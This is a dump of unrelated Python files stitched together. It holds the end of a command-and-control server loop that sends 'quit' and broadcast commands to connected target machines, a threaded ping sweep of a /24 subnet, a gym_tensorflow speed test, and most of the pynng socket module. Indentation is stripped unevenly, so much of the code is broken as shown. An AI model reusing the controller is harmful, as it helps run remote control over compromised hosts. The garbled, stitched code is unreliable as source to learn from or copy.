            print('[-] No Session Under That ID Number')
elif command == 'exit':
for target in targets:
reliable_send(target, 'quit')
target.close()
sock.close()
stop_flag = True
t1.join()
break
elif command[:4] == 'kill':
targ = targets[int(command[5:])]
ip = ips[int(command[5:])]
reliable_send(targ, 'quit')
targ.close()
targets.remove(targ)
ips.remove(ip)
elif command[:7] == 'sendall':
x = len(targets)
print(x)
i = 0
try:
while i < x:
tarnumber = targets[i]
print(tarnumber)
reliable_send(tarnumber, command)
i += 1
        except OSError:
            print('Failed')
else:
print(termcolor.colored("[!!] Command Doesn't Exist", 'red'))
|
mtping.py | import subprocess
import threading
def ping(host):
    rc = subprocess.call(
        # Use '>' plus '2>&1' rather than bash-only '&>': shell=True runs
        # /bin/sh, where '&>' would background the command instead of
        # redirecting its output.
        'ping -c2 %s > /dev/null 2>&1' % host,
        shell=True
    )
if rc == 0:
print(host)
if __name__ == '__main__':
ips = ['172.40.58.%s' % i for i in range(1, 255)]
for ip in ips:
        # Create a thread: ping is the function defined above, and args holds the arguments passed to it.
t = threading.Thread(target=ping, args=(ip,))
        t.start()  # runs ping(ip)
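# An alternative sketch (not used above): bound the number of concurrent
# pings with a thread pool instead of one thread per address:
#
#     from concurrent.futures import ThreadPoolExecutor
#     with ThreadPoolExecutor(max_workers=64) as pool:
#         pool.map(ping, ips)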
|
time_env.py | '''
Copyright (c) 2018 Uber Technologies, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import time
import threading
import tensorflow as tf
import gym_tensorflow
from gym_tensorflow.wrappers import AutoResetWrapper
def main(num_actors, num_threads, game_id='pong',
use_tfenv=True, render=False):
'''Speed test.
    Using 16 actors * 1 thread, it should be as high as 10000 steps/s.
    Using 128 actors * 16 threads (full stress test), it should be as high as 30000 steps/s
    on a 40-thread (20-core * 2 HT) CPU machine.
'''
    # The second positional argument of tf.Variable is `trainable`, so the
    # dtype must be passed by keyword.
    counter = tf.Variable(0, dtype=tf.int64)
def make_env():
env = AutoResetWrapper(gym_tensorflow.atari.AtariEnv(game_id, num_actors))
tf_rew, tf_done = env.step(tf.zeros((num_actors,), tf.int32))
render_op = env.env.render() if render else tf.no_op()
reward_op = tf_rew
counter_op = tf.assign_add(counter, num_actors, use_locking=True)
def _run(sess):
sess.run([reward_op, counter_op, render_op])
return _run
step_op = [make_env() for _ in range(num_threads)]
def thread_f(sess, e):
while True:
e(sess)
time.sleep(0)
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
threads = [threading.Thread(target=thread_f, args=(sess, e)) for e in step_op]
for t in threads:
            t.daemon = True  # Thread.setDaemon() is deprecated
t._state = 0
t.start()
print("main thread start")
tstart = time.time()
num_steps = 0
while True:
diff = sess.run(counter) - num_steps
time_str = time.strftime('%Y%m%d-%H%M%S')
print('{} Rate: {:.0f} steps/s'.format(time_str, diff / (time.time() - tstart)), flush=True)
tstart = time.time()
num_steps += diff
time.sleep(5)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--num-actors', default=128, type=int, help='Number of actors per thread.')
parser.add_argument('--num-threads', default=16, type=int, help='Number of threads to run.')
parser.add_argument('--render', action='store_true', help='If set, fetch render op as well (slower)')
args = parser.parse_args()
main(num_actors=args.num_actors,
num_threads=args.num_threads,
render=args.render)
|
nng.py | """
Provides a Pythonic interface to cffi nng bindings
"""
import logging
import threading
import atexit
import pynng
from ._nng import ffi, lib
from .exceptions import check_err
from . import options
from . import _aio
logger = logging.getLogger(__name__)
__all__ = '''
ffi
Bus0
Pair0
Pair1
Pull0 Push0
Pub0 Sub0
Req0 Rep0
Socket
Surveyor0 Respondent0
'''.split()
# Register an atexit handler to call the nng_fini() cleanup function.
# This is necessary to ensure:
# * The Python interpreter doesn't finalize and kill the reap thread
# during a callback to _nng_pipe_cb
# * Cleanup background queue threads used by NNG
def _pynng_atexit():
lib.nng_fini()
atexit.register(_pynng_atexit)
def _ensure_can_send(thing):
"""
It's easy to accidentally pass in a str instead of bytes when send()ing.
This gives a more informative message if a ``str`` was accidentally passed
to a send method.
"""
# at some point it might be nice to check for the specific types we **can**
# send...
if isinstance(thing, str):
raise ValueError('Cannot send type str. '
'Maybe you left out a ".encode()" somewhere?')
def to_char(charlike):
"""Convert str or bytes to char*."""
# fast path for stuff that doesn't need to be changed.
if isinstance(charlike, ffi.CData):
return charlike
if isinstance(charlike, str):
charlike = charlike.encode()
charlike = ffi.new('char[]', charlike)
return charlike
class _NNGOption:
"""A descriptor for more easily getting/setting NNG option."""
# this class should not be instantiated directly! Instantiation will work,
# but getting/setting will fail.
# subclasses set _getter and _setter to the module-level getter and setter
# functions
_getter = None
_setter = None
def __init__(self, option_name):
self.option = to_char(option_name)
def __get__(self, instance, owner):
# have to look up the getter on the class
if self._getter is None:
            raise TypeError("{} cannot be read".format(self.__class__))
return self.__class__._getter(instance, self.option)
def __set__(self, instance, value):
if self._setter is None:
raise TypeError("{} is readonly".format(self.__class__))
self.__class__._setter(instance, self.option, value)
class IntOption(_NNGOption):
"""Descriptor for getting/setting integer options"""
_getter = options._getopt_int
_setter = options._setopt_int
class MsOption(_NNGOption):
"""Descriptor for getting/setting durations (in milliseconds)"""
_getter = options._getopt_ms
_setter = options._setopt_ms
class SockAddrOption(_NNGOption):
    """Descriptor for getting socket addresses"""
_getter = options._getopt_sockaddr
class SizeOption(_NNGOption):
"""Descriptor for getting/setting size_t options"""
_getter = options._getopt_size
_setter = options._setopt_size
class StringOption(_NNGOption):
"""Descriptor for getting/setting string options"""
_getter = options._getopt_string
_setter = options._setopt_string
class BooleanOption(_NNGOption):
"""Descriptor for getting/setting boolean values"""
_getter = options._getopt_bool
_setter = options._setopt_bool
class PointerOption(_NNGOption):
"""Descriptor for setting pointer values"""
_setter = options._setopt_ptr
class NotImplementedOption(_NNGOption):
"""Represents a currently un-implemented option in Python."""
def __init__(self, option_name, errmsg):
super().__init__(option_name)
self.errmsg = errmsg
def __get__(self, instance, owner):
raise NotImplementedError(self.errmsg)
def __set__(self, instance, value):
raise NotImplementedError(self.errmsg)
class Socket:
"""
Open a socket with one of the scalability protocols. This should not be
instantiated directly; instead, one of its subclasses should be used.
There is one subclass per protocol. The available protocols are:
* :class:`Pair0`
* :class:`Pair1`
* :class:`Req0` / :class:`Rep0`
* :class:`Pub0` / :class:`Sub0`
* :class:`Push0` / :class:`Pull0`
* :class:`Surveyor0` / :class:`Respondent0`
* :class:`Bus0`
The socket initializer receives no positional arguments. It accepts the
following keyword arguments, with the same meaning as the :ref:`attributes
<socket-attributes>` described below: ``recv_timeout``, ``send_timeout``,
``recv_buffer_size``, ``send_buffer_size``, ``reconnect_time_min``,
    ``reconnect_time_max``, and ``name``.
To talk to another socket, you have to either :meth:`~Socket.dial`
its address, or :meth:`~Socket.listen` for connections. Then you can
:meth:`~Socket.send` to send data to the remote sockets or
:meth:`~Socket.recv` to receive data from the remote sockets.
Asynchronous versions are available as well, as :meth:`~Socket.asend`
and :meth:`~Socket.arecv`. The supported event loops are :mod:`asyncio`
and `Trio`_. You must ensure that you :meth:`~Socket.close` the socket
when you are finished with it. Sockets can also be used as a context
manager; this is the preferred way to use them when possible.
.. _socket-attributes:
Sockets have the following attributes. Generally, you should set these
attributes before :meth:`~Socket.listen`-ing or
:meth:`~Socket.dial`-ing, or by passing them in as keyword arguments
when creating the :class:`Socket`:
* **recv_timeout** (int): Receive timeout, in ms. If a socket takes longer
than the specified time, raises a ``pynng.exceptions.Timeout``.
Corresponds to library option ``NNG_OPT_RECVTIMEO``
* **send_timeout** (int): Send timeout, in ms. If the message cannot
be queued in the specified time, raises a pynng.exceptions.Timeout.
Corresponds to library option ``NNG_OPT_SENDTIMEO``.
* **recv_max_size** (int): The largest size of a message to receive.
Messages larger than this size will be silently dropped. A size of 0
indicates unlimited size. The default size is 1 MB.
* **recv_buffer_size** (int): The number of messages that the socket
will buffer on receive. Corresponds to ``NNG_OPT_RECVBUF``.
* **send_buffer_size** (int): The number of messages that the socket
will buffer on send. Corresponds to ``NNG_OPT_SENDBUF``.
* **name** (str): The socket name. Corresponds to
``NNG_OPT_SOCKNAME``. This is useful for debugging purposes.
* **raw** (bool): A boolean, indicating whether the socket is raw or cooked.
Returns ``True`` if the socket is raw, else ``False``. This property
is read-only. Corresponds to library option ``NNG_OPT_RAW``. For
      more information see `nng's documentation
      <https://nanomsg.github.io/nng/man/v1.0.1/nng.7.html#raw_mode>`_.
      Note that currently, pynng does not support ``raw`` mode sockets, but
      we intend to support them `in the future
      <https://github.com/codypiersall/pynng/issues/35>`_.
* **protocol** (int): Read-only option which returns the 16-bit number
of the socket's protocol.
* **protocol_name** (str): Read-only option which returns the name of the
socket's protocol.
* **peer** (int): Returns the peer protocol id for the socket.
* **local_address**: The :class:`~pynng.sockaddr.SockAddr` representing
the local address. Corresponds to ``NNG_OPT_LOCADDR``.
* **reconnect_time_min** (int): The minimum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMINT``.
This can also be overridden on the dialers.
* **reconnect_time_max** (int): The maximum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMAXT``.
If this is non-zero, then the time between successive connection
attempts will start at the value of ``reconnect_time_min``, and grow
exponentially, until it reaches this value. This option can be set
on the socket, or on the dialers associated with the socket.
* **recv_fd** (int): The receive file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can receive data without blocking. Corresponds to
``NNG_OPT_RECVFD``.
* **send_fd** (int): The sending file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can send data without blocking. Corresponds to
``NNG_OPT_SENDFD``.
.. Note::
When used in :func:`select.poll` or :func:`select.select`,
``recv_fd`` and ``send_fd`` are both marked as **readable** when
they can receive or send data without blocking. So the upshot is
that for :func:`select.select` they should be passed in as the
*rlist* and for :meth:`select.poll.register` the *eventmask*
should be ``POLLIN``.
* **tls_config** (:class:`~pynng.TLSConfig`): The TLS configuration for
this socket. This option is only valid if the socket is using the
TLS transport. See :class:`~pynng.TLSConfig` for information about
the TLS configuration. Corresponds to ``NNG_OPT_TLS_CONFIG``. This
option is write-only.
.. _Trio: https://trio.readthedocs.io
"""
# TODO: Do we need to document ttl_max? We're not supporting nng_device
# yet, so I guess not?
# the following options correspond to nng options documented at
# https://nanomsg.github.io/nng/man/v1.0.1/nng_options.5.html
name = StringOption('socket-name')
raw = BooleanOption('raw')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
recv_buffer_size = IntOption('recv-buffer')
send_buffer_size = IntOption('send-buffer')
recv_timeout = MsOption('recv-timeout')
send_timeout = MsOption('send-timeout')
ttl_max = IntOption('ttl-max')
recv_max_size = SizeOption('recv-size-max')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_fd = IntOption('recv-fd')
send_fd = IntOption('send-fd')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
def __init__(self, *,
dial=None,
listen=None,
recv_timeout=None,
send_timeout=None,
recv_buffer_size=None,
send_buffer_size=None,
recv_max_size=None,
reconnect_time_min=None,
reconnect_time_max=None,
opener=None,
block_on_dial=None,
name=None,
tls_config=None,
async_backend=None
):
# mapping of id: Python objects
self._dialers = {}
self._listeners = {}
self._pipes = {}
self._on_pre_pipe_add = []
self._on_post_pipe_add = []
self._on_post_pipe_remove = []
self._pipe_notify_lock = threading.Lock()
self._async_backend = async_backend
self._socket = ffi.new('nng_socket *',)
if opener is not None:
self._opener = opener
if opener is None and not hasattr(self, '_opener'):
raise TypeError('Cannot directly instantiate a Socket. Try a subclass.')
check_err(self._opener(self._socket))
if tls_config is not None:
self.tls_config = tls_config
if recv_timeout is not None:
self.recv_timeout = recv_timeout
if send_timeout is not None:
self.send_timeout = send_timeout
if recv_max_size is not None:
self.recv_max_size = recv_max_size
if reconnect_time_min is not None:
self.reconnect_time_min = reconnect_time_min
if reconnect_time_max is not None:
self.reconnect_time_max = reconnect_time_max
if recv_buffer_size is not None:
self.recv_buffer_size = recv_buffer_size
if send_buffer_size is not None:
self.send_buffer_size = send_buffer_size
if name is not None:
self.name = name
# set up pipe callbacks. This **must** be called before listen/dial to
# avoid race conditions.
handle = ffi.new_handle(self)
self._handle = handle
for event in (lib.NNG_PIPE_EV_ADD_PRE, lib.NNG_PIPE_EV_ADD_POST,
lib.NNG_PIPE_EV_REM_POST):
check_err(lib.nng_pipe_notify(
self.socket, event, lib._nng_pipe_cb, handle))
if listen is not None:
self.listen(listen)
if dial is not None:
self.dial(dial, block=block_on_dial)
def dial(self, address, *, block=None):
"""Dial the specified address.
Args:
address: The address to dial.
block: Whether to block or not. There are three possible values
this can take:
1. If ``True``, a blocking dial is attempted. If it fails for
any reason, the dial fails and an exception is raised.
2. If ``False``, a non-blocking dial is started. The dial is
retried periodically in the background until it is
successful.
3. (**Default behavior**): If ``None``, a blocking dial is
first attempted. If it fails an exception is logged (using
the Python logging module), then a non-blocking dial is
done.
"""
if block:
return self._dial(address, flags=0)
elif block is None:
try:
                return self.dial(address, block=True)
except pynng.ConnectionRefused:
msg = 'Synchronous dial failed; attempting asynchronous now'
logger.exception(msg)
return self.dial(address, block=False)
else:
return self._dial(address, flags=lib.NNG_FLAG_NONBLOCK)
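    # For example, a sketch of the three ``block`` modes (the address is
    # illustrative):
    #
    #     s.dial('tcp://127.0.0.1:13131', block=True)   # raise if the dial fails
    #     s.dial('tcp://127.0.0.1:13131', block=False)  # retry in the background
    #     s.dial('tcp://127.0.0.1:13131')               # try blocking, fall back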
def _dial(self, address, flags=0):
"""Dial specified ``address``
``flags`` usually do not need to be given.
"""
dialer = ffi.new('nng_dialer *')
ret = lib.nng_dial(self.socket, to_char(address), dialer, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
d_id = lib.nng_dialer_id(dialer[0])
py_dialer = Dialer(dialer, self)
self._dialers[d_id] = py_dialer
return py_dialer
def listen(self, address, flags=0):
"""Listen at specified address.
        ``flags`` usually does not need to be given.
"""
listener = ffi.new('nng_listener *')
ret = lib.nng_listen(self.socket, to_char(address), listener, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
l_id = lib.nng_listener_id(listener[0])
py_listener = Listener(listener, self)
self._listeners[l_id] = py_listener
return py_listener
def close(self):
"""Close the socket, freeing all system resources."""
# if a TypeError occurs (e.g. a bad keyword to __init__) we don't have
# the attribute _socket yet. This prevents spewing extra exceptions
if hasattr(self, '_socket'):
lib.nng_close(self.socket)
# cleanup the list of listeners/dialers. A program would be likely to
# segfault if a user accessed the listeners or dialers after this
# point.
self._listeners = {}
self._dialers = {}
def __del__(self):
self.close()
@property
def socket(self):
return self._socket[0]
def recv(self, block=True):
"""Receive data on the socket. If the request times out the exception
:class:`pynng.Timeout` is raised. If the socket cannot perform that
operation (e.g., a :class:`Pub0`, which can only
:meth:`~Socket.send`), the exception :class:`pynng.NotSupported`
is raised.
Args:
block: If block is True (the default), the function will not return
until the operation is completed or times out. If block is False,
the function will return data immediately. If no data is ready on
the socket, the function will raise ``pynng.TryAgain``.
"""
# TODO: someday we should support some kind of recv_into() operation
# where the user provides the data buffer.
flags = lib.NNG_FLAG_ALLOC
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
data = ffi.new('char **')
size_t = ffi.new('size_t *')
ret = lib.nng_recv(self.socket, data, size_t, flags)
check_err(ret)
recvd = ffi.unpack(data[0], size_t[0])
lib.nng_free(data[0], size_t[0])
return recvd
def send(self, data):
"""Sends ``data`` (either ``bytes`` or ``bytearray``) on socket."""
_ensure_can_send(data)
err = lib.nng_send(self.socket, data, len(data), 0)
check_err(err)
async def arecv(self):
"""The asynchronous version of :meth:`~Socket.recv`"""
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronous version of :meth:`~Socket.send`."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.asend(data)
def __enter__(self):
return self
def __exit__(self, *tb_info):
self.close()
@property
def dialers(self):
"""A list of the active dialers"""
return tuple(self._dialers.values())
@property
def listeners(self):
"""A list of the active listeners"""
return tuple(self._listeners.values())
@property
def pipes(self):
"""A list of the active pipes"""
return tuple(self._pipes.values())
def _add_pipe(self, lib_pipe):
# this is only called inside the pipe callback.
pipe_id = lib.nng_pipe_id(lib_pipe)
# If the pipe already exists in the Socket, don't create a new one
if pipe_id not in self._pipes:
pipe = Pipe(lib_pipe, self)
self._pipes[pipe_id] = pipe
return self._pipes[pipe_id]
def _remove_pipe(self, lib_pipe):
pipe_id = lib.nng_pipe_id(lib_pipe)
del self._pipes[pipe_id]
def new_context(self):
"""Return a new :class:`Context` for this socket."""
return Context(self)
def add_pre_pipe_connect_cb(self, callback):
"""
Add a callback which will be called before a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a Pipe. The
socket associated with the pipe can be accessed through the pipe's
        ``socket`` attribute. If the pipe is closed in this callback, the
        post_pipe_connect and post_pipe_remove callbacks will not be called.
"""
self._on_pre_pipe_add.append(callback)
def add_post_pipe_connect_cb(self, callback):
"""
Add a callback which will be called after a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_add.append(callback)
def add_post_pipe_remove_cb(self, callback):
"""
Add a callback which will be called after a Pipe is removed from a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_remove.append(callback)
def remove_pre_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for pre pipe connect
events
"""
self._on_pre_pipe_add.remove(callback)
def remove_post_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe connect
events
"""
self._on_post_pipe_add.remove(callback)
def remove_post_pipe_remove_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe remove
events
"""
self._on_post_pipe_remove.remove(callback)
    def _try_associate_msg_with_pipe(self, msg):
        """Looks up the pipe associated with ``msg``'s underlying nng_msg and
        attempts to set it as the message's ``pipe`` attribute
"""
# Wrap pipe handling inside the notify lock since we can create
# a new Pipe and associate it with the Socket if the callbacks
# haven't been called yet. This will ensure there's no race
# condition with the pipe callbacks.
with self._pipe_notify_lock:
lib_pipe = lib.nng_msg_get_pipe(msg._nng_msg)
pipe_id = lib.nng_pipe_id(lib_pipe)
try:
msg.pipe = self._pipes[pipe_id]
except KeyError:
# A message may have been received before the pipe callback was called.
# Create a new Pipe and associate it with the Socket.
                # When the callback is called, it will detect that the pipe was already added.
# if pipe_id < 0, that *probably* means we hit a race where the
# associated pipe was closed.
if pipe_id >= 0:
# Add the pipe to the socket
msg.pipe = self._add_pipe(lib_pipe)
def recv_msg(self, block=True):
"""Receive a :class:`Message` on the socket."""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_recvmsg(self.socket, msg_p, flags))
msg = msg_p[0]
msg = Message(msg)
self._try_associate_msg_with_pipe(msg)
return msg
def send_msg(self, msg, block=True):
"""Send the :class:`Message` ``msg`` on the socket.
.. Note::
            It may be more convenient to call :meth:`Pipe.send` than this
method.
"""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
with msg._mem_freed_lock:
msg._ensure_can_send()
check_err(lib.nng_sendmsg(self.socket, msg._nng_msg, flags))
msg._mem_freed = True
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the socket.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
        Asynchronously receive a :class:`Message` on the socket.
"""
with _aio.AIOHelper(self, self._async_backend) as aio:
msg = await aio.arecv_msg()
self._try_associate_msg_with_pipe(msg)
return msg
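# A minimal sketch of typical Socket usage (the subclass and address are
# illustrative; see the protocol classes below):
#
#     with Pair0(listen='tcp://127.0.0.1:54321') as s:
#         s.send(b'hello')   # bytes only; passing a str raises ValueError
#         data = s.recv()    # blocks until a message arrives or recv_timeout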
class Bus0(Socket):
"""A bus0 socket. The Python version of `nng_bus
<https://nanomsg.github.io/nng/man/tip/nng_bus.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
A :class:`Bus0` socket sends a message to all directly connected peers.
This enables creating mesh networks. Note that messages are only sent to
*directly* connected peers. You must explicitly connect all nodes with the
    :meth:`~Socket.listen` and corresponding :meth:`~Socket.dial` calls.
Here is a demonstration of using the bus protocol:
.. literalinclude:: snippets/bus0_sync.py
:language: python3
"""
_opener = lib.nng_bus0_open
class Pair0(Socket):
    """A socket for bidirectional, one-to-one communication, with a single
partner. The Python version of `nng_pair0
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
This is the most basic type of socket.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
This demonstrates the synchronous API:
.. literalinclude:: snippets/pair0_sync.py
:language: python3
This demonstrates the asynchronous API using `Trio`_. Remember that
:mod:`asyncio` is also supported.
.. literalinclude:: snippets/pair0_async.py
:language: python3
"""
_opener = lib.nng_pair0_open
class Pair1(Socket):
    """A socket for bidirectional communication with potentially many peers.
The Python version of `nng_pair1
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`. It also has one extra
keyword-only argument, ``polyamorous``, which must be set to ``True`` to
connect with more than one peer.
.. Warning::
If you want to connect to multiple peers you **must** pass
``polyamorous=True`` when you create your socket. ``polyamorous`` is a
read-only attribute of the socket and cannot be changed after creation.
.. Warning::
Pair1 was an experimental feature in nng, and is currently deprecated.
It will likely be removed in the future; see `nng's docs
<https://nng.nanomsg.org/man/v1.3.2/nng_pair_open.3.html>`_ for
details.
To get the benefits of polyamory, you need to use the methods that work
with :class:`Message` objects: :meth:`Socket.recv_msg` and
:meth:`Socket.arecv_msg` for receiving, and :meth:`Pipe.send`
and :meth:`Pipe.asend` for sending.
Here is an example of the synchronous API, where a single listener connects
to multiple peers. This is more complex than the :class:`Pair0` case,
because it requires to use the :class:`Pipe` and :class:`Message`
interfaces.
.. literalinclude:: snippets/pair1_sync.py
And here is an example using the async API, using `Trio`_.
.. literalinclude:: snippets/pair1_async.py
"""
    def __init__(self, *, polyamorous=False, **kwargs):
        # The opener has to be chosen before the base class opens the socket.
        if polyamorous:
            self._opener = lib.nng_pair1_open_poly
        else:
            self._opener = lib.nng_pair1_open
        # make sure we don't listen/dial before the socket is open, so we pop
        # the addresses out of kwargs, then do the dial/listen below.
        dial_addr = kwargs.pop('dial', None)
        listen_addr = kwargs.pop('listen', None)
        super().__init__(**kwargs)
        # now we can do the listen/dial
        if dial_addr is not None:
            self.dial(dial_addr, block=kwargs.get('block_on_dial'))
        if listen_addr is not None:
            self.listen(listen_addr)
_opener = lib.nng_pair1_open_poly
polyamorous = BooleanOption('pair1:polyamorous')
class Push0(Socket):
"""A push0 socket.
The Python version of `nng_push
<https://nanomsg.github.io/nng/man/tip/nng_push.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Push0` socket is the pushing end of a data pipeline. Data sent
from a push socket will be sent to a *single* connected :class:`Pull0`
socket. This can be useful for distributing work to multiple nodes, for
example. Attempting to call :meth:`~Socket.recv()` on a Push0 socket
will raise a :class:`pynng.NotSupported` exception.
Here is an example of two :class:`Pull0` sockets connected to a
:class:`Push0` socket.
.. literalinclude:: snippets/pushpull_sync.py
"""
_opener = lib.nng_push0_open
class Pull0(Socket):
"""A pull0 socket.
The Python version of `nng_pull
<https://nanomsg.github.io/nng/man/tip/nng_pull.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Pull0` is the receiving end of a data pipeline. It needs to be
paired with a :class:`Push0` socket.
Attempting to :meth:`~Socket.send()`
with a Pull0 socket will raise a :class:`pynng.NotSupported` exception.
See :class:`Push0` for an example of push/pull in action.
"""
_opener = lib.nng_pull0_open
class Pub0(Socket):
"""A pub0 socket.
The Python version of `nng_pub
<https://nanomsg.github.io/nng/man/tip/nng_pub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
    same :ref:`attributes <socket-attributes>`. When a :class:`Pub0` socket
    calls :meth:`~Socket.send`, the data is published to all connected
:class:`subscribers <Sub0>`.
Attempting to :meth:`~Socket.recv` with a Pub0 socket will raise a
:class:`pynng.NotSupported` exception.
See docs for :class:`Sub0` for an example.
"""
_opener = lib.nng_pub0_open
class Sub0(Socket):
"""A sub0 socket.
The Python version of `nng_sub
<https://nanomsg.github.io/nng/man/tip/nng_sub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one
additional keyword argument: ``topics``. If ``topics`` is given, it must
be either a :class:`str`, :class:`bytes`, or an iterable of str and bytes.
A subscriber must :meth:`~Sub0.subscribe` to specific topics, and only
messages that match the topic will be received. A subscriber can subscribe
to as many topics as you want it to.
A match is determined if the message starts with one of the subscribed
topics. So if the subscribing socket is subscribed to the topic
    ``b'hel'``, then the messages ``b'hel'``, ``b'help him'`` and ``b'hello'``
would match, but the message ``b'hexagon'`` would not. Subscribing to an
empty string (``b''``) means that all messages will match. If a sub socket
    is not subscribed to any topics, no messages will be received.
.. Note ::
pub/sub is a "best effort" transport; if you have a very high volume of
messages be prepared for some messages to be silently dropped.
Attempting to :meth:`~Socket.send` with a Sub0 socket will raise a
:class:`pynng.NotSupported` exception.
The following example demonstrates a basic usage of pub/sub:
.. literalinclude:: snippets/pubsub_sync.py
"""
_opener = lib.nng_sub0_open
def __init__(self, *, topics=None, **kwargs):
super().__init__(**kwargs)
if topics is None:
return
# special-case str/bytes
if isinstance(topics, (str, bytes)):
topics = [topics]
for topic in topics:
self.subscribe(topic)
def subscribe(self, topic):
"""Subscribe to the specified topic.
Topics are matched by looking at the first bytes of any received
message.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:subscribe', topic)
    def unsubscribe(self, topic):
        """Unsubscribe from the specified topic.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:unsubscribe', topic)
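# A minimal sketch of the topic matching described above (the inproc address
# is illustrative, and since pub/sub is best-effort a real script may need a
# short pause after connecting before the first send):
#
#     with Pub0(listen='inproc://demo') as pub, \
#             Sub0(dial='inproc://demo', topics=b'hel') as sub:
#         pub.send(b'hello world')  # starts with b'hel', so it matches
#         assert sub.recv() == b'hello world'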
class Req0(Socket):
"""A req0 socket.
The Python version of `nng_req
<https://nanomsg.github.io/nng/man/tip/nng_req.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one extra
keyword-argument: ``resend_time``. ``resend_time`` corresponds to
``NNG_OPT_REQ_RESENDTIME``
A :class:`Req0` socket is paired with a :class:`Rep0` socket and together
    they implement normal request/response behavior: the req socket
    :meth:`send()s <Socket.send>` a request, the rep socket :meth:`recv()s
    <Socket.recv>` it, the rep socket :meth:`send()s <Socket.send>` a response,
and the req socket :meth:`recv()s <Socket.recv>` it.
If a req socket attempts to do a :meth:`~Socket.recv` without first doing a
:meth:`~Socket.send`, a :class:`pynng.BadState` exception is raised.
A :class:`Req0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a req
socket can have multiple outstanding requests to a single rep socket.
Without opening a :class:`Context`, the socket can only have a single
outstanding request at a time.
Here is an example demonstrating the request/response pattern.
.. literalinclude:: snippets/reqrep_sync.py
"""
resend_time = MsOption('req:resend-time')
_opener = lib.nng_req0_open
def __init__(self, *, resend_time=None, **kwargs):
super().__init__(**kwargs)
if resend_time is not None:
self.resend_time = resend_time
class Rep0(Socket):
"""A rep0 socket.
The Python version of `nng_rep
<https://nanomsg.github.io/nng/man/tip/nng_rep.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Rep0` socket along with a :class:`Req0` socket implement the
request/response pattern:
the req socket :meth:`send()s <Socket.send>` a
request, the rep socket :meth:`recv()s <Socket.recv>` it, the rep socket
    :meth:`send()s <Socket.send>` a response, and the req socket :meth:`recv()s
<Socket.recv>` it.
A :class:`Rep0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a rep
socket can service multiple requests at the same time. Without opening a
:class:`Context`, the rep socket can only service a single request at a
time.
See the documentation for :class:`Req0` for an example.
"""
_opener = lib.nng_rep0_open
class Surveyor0(Socket):
